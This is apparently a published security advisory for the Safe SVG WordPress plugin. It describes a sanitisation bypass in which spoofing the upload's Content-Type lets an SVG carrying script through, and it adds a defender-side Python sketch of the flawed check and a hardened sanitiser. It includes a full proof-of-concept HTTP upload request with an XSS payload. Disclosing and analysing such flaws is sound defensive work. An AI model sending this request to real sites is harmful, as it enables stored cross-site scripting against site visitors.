Safe SVG < 1.9.10 - SVG Sanitisation Bypass
Description
The plugin's sanitisation step can be bypassed by spoofing the Content-Type of the file part in the upload POST request. By exploiting this vulnerability, an attacker can carry out the kinds of attacks the plugin is meant to prevent (mainly XSS, but, depending on how the uploaded SVG files are used further, potentially other XML-based attacks as well).
Proof of Concept
POST /wp-admin/async-upload.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------27451310545300823063986174174
Content-Length: 947
Connection: close
Cookie: [user with upload capability]

-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="name"

xss.svg
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="action"

upload-attachment
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="_wpnonce"

b281e72731
-----------------------------27451310545300823063986174174
Content-Disposition: form-data; name="async-upload"; filename="xss.svg"
Content-Type: image/png

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>
-----------------------------27451310545300823063986174174--
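As an added, defender-side illustration (not code from the plugin or from the researcher), the gating mistake the advisory describes, trusting the client-declared part Content-Type, beside a gate that sniffs the bytes and a minimal sanitiser; the function names, the sample SVG and the allow-list are assumptions made for this example.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ET.register_namespace("", SVG_NS)  # keep <svg> unprefixed when re-serialising

# Constructed sample mirroring the advisory's PoC file part: an SVG carrying <script>.
SAMPLE_SVG = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">alert(/XSS/);</script>
</svg>"""

def sanitiser_runs_vulnerable(declared_type: str) -> bool:
    # The bypassed pattern: gate the sanitiser on the client-supplied part
    # Content-Type. Declaring "image/png" on an SVG body skips it entirely.
    return declared_type.lower() == "image/svg+xml"

def sanitiser_runs_hardened(data: bytes) -> bool:
    # Decide from the bytes instead. Over-approximate on purpose: anything with
    # "<svg" near the start is treated as SVG and must go through the sanitiser.
    return b"<svg" in data[:4096].lower()

DANGEROUS_TAGS = {"script", "foreignObject"}
def _local(name: str) -> str:
    return name.rsplit("}", 1)[-1]  # drop the "{namespace}" prefix ET adds

def sanitize_svg(data: bytes) -> bytes:
    """Minimal pass: drop script-bearing elements, on* event handlers and
    javascript: hrefs. Raises on malformed XML or a non-<svg> root."""
    root = ET.fromstring(data)  # expat does not fetch the external DTD
    if _local(root.tag) != "svg":
        raise ValueError("root element is not <svg>")
    for el in list(root.iter()):
        for child in list(el):
            if _local(child.tag) in DANGEROUS_TAGS:
                el.remove(child)
        for attr in list(el.attrib):
            name = _local(attr).lower()
            value = el.attrib[attr].strip().lower()
            if name.startswith("on") or (name == "href" and value.startswith("javascript:")):
                del el.attrib[attr]
    return ET.tostring(root)

def accept_upload(data: bytes, declared_type: str) -> bytes:
    """Hardened upload gate: the declared type may be logged, never trusted."""
    if sanitiser_runs_hardened(data):
        return sanitize_svg(data)
    return data
```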
Miscellaneous
Original Researcher
David Hamann
Submitter
David Hamann
Verified
Yes
Timeline
Publicly Published
2022-03-25
Added
2022-03-25
Last Updated
2022-04-11